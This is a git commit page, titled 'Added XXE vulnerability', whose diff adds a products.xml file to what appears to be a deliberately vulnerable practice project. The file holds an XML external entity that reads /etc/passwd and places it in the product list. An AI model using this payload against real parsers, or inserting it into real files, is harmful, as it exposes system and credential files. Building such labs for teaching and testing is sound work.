Added XXE vulnerability
This commit is contained in:
10
project1/static/products.xml
Normal file
10
project1/static/products.xml
Normal file
@ -0,0 +1,10 @@
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
|
||||
<products>
|
||||
<product>Coffee</product>
|
||||
<product>Tea</product>
|
||||
<product>Chocholate</product>
|
||||
<product>&xxe;</product>
|
||||
</products>
|
Reference in New Issue
Block a user